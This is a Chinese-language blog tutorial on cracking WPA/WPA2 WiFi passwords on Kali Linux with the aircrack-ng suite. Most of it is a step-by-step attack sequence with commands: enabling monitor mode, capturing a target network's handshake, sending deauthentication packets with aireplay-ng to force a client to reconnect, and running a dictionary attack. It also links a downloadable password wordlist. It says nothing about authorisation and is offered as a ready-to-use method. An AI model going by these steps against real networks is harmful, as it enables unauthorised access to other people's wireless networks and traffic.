Kali使用Aircrack-ng进行暴力破解WIFI密码
Kali系統使用Aircrack-ng進行暴力破解WIFI密碼
- 一、什么是Aircrack-ng
- 運行環境
- 插入網卡設備
- 二、破解流程
- 1.進入管理員模式
- 2.查看網卡信息
- 3.殺掉沖突進程
- 4.查看網卡是否支持監聽模式
- 5.開啟無線網卡監聽模式
- 5.獲取附近的AP信息(搜WIFI)
- 6.開始抓取握手包并保存成文件
- (1) 等待新的設備連接WIFI
- (2) 主動攻擊
- 6. 破解握手包密碼
- 7.關閉監聽模式
- 三、總結
- 1.問題
- 2.密碼字典
一、什么是Aircrack-ng
Aircrack-ng是一個與802.11標準的無線網絡分析有關的安全軟件,主要功能有:網絡偵測,數據包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監聽模式的無線網卡上(設備列表請參閱其官方網站)并嗅探802.11a,802.11b,802.11g的數據。該程序可運行在Linux和Windows上。Linux版本已經被移植到了Zaurus和Maemo系統平臺, 并概念驗證可移植到iPhone。
運行環境
使用Kali 2021.3進行演示操作
軟件:aircrack-ng(Kali系統內置)
外置無線網卡設備: 要支持監聽,支持Linux并且免驅(我這里使用的是RT3070)
插入網卡設備
二、破解流程
1.進入管理員模式
命令: sudo su
解釋: 不在管理員模式下運行可能會有權限不夠的提示
提示:執行命令之后輸入Kali的密碼,密碼是被隱藏的,直接輸入然后回車即可
2.查看網卡信息
命令: iwconfig/ifconfig
解釋: iwconfig查看網卡的信息、ifconfig查看新連接的設備
wlan0就是我們的無線網卡
3.殺掉沖突進程
命令: airmon-ng check kill
解釋: 殺死進程可以讓搜索更準確,不會受到影響
4.查看網卡是否支持監聽模式
命令: airmon-ng
出現你的網卡信息就說明你的網卡支持監聽
5.開啟無線網卡監聽模式
命令: airmon-ng start wlan0
解釋: start開啟哪個接口 wlan0是接口的名字
再用iwconfig查看一下網卡信息,wlan0后面多了個mon,wlan0mon就說明已經開啟監聽了
5.獲取附近的AP信息(搜WIFI)
命令: airodump-ng wlan0mon
解釋: BSSID:WIFI的MAC地址、PWR:信號強度(值越小信號強度強)、Data:監聽期間流量總合、CH:信道、ENC:加密算法、ESSID:WIFI名稱
提示:找到網絡之后CTRL+Z結束搜索就可以
6.開始抓取握手包并保存成文件
命令: airodump-ng -c (頻道號) --bssid (MAC地址) -w (抓取的數據包的保存位置) wlan0mon
解釋:
我要破解的目標網絡是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目錄下創建了一個名為1的文件夾
輸入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
提示:所有的數值都要寫剛剛查到要破解的WIFI其中一個客戶端的值
(1) 等待新的設備連接WIFI
當新的客戶端連接時,客戶端輸入密碼連接就可以抓到握手包,右上角出現WPA時就表示已經抓到了對方的握手包
(2) 主動攻擊
命令: aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon
解釋:
執行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon
捕捉到握手包時就停止攻擊
注意:執行主動攻擊的時候新建一個終端執行命令,原來的抓包終端不要結束
6. 破解握手包密碼
命令: aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap
解釋:
最后就是等待跑字典了,下面就是破解的WIFI密碼,密碼是20041101
7.關閉監聽模式
命令: airmon-ng stop wlan0mon
在監聽模式下,kali不能連接網絡
三、總結
1.問題
插入網卡,如果查看不到網卡信息,可以點開連接WIFI看一下能否搜索到附近的網絡,如果不行那就右鍵系統可移動設備-把網卡斷開再重新連接一下
2.密碼字典
插入網卡,打開網卡的監聽模式,搜索附近的WIFI,獲取握手包,最后跑字典破解握手包,這里給大家提供一個常用的密碼字典
鏈接: https://pan.baidu.com/s/1NSNniAvaLdcY0HALbBnUTw?pwd=gg7y
提取碼: gg7y
總結
以上是生活随笔為你收集整理的Kali使用Aircrack-ng进行暴力破解WIFI密码的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java jsp开发的电子商务系统代码下
- 下一篇: SSL数字证书是什么?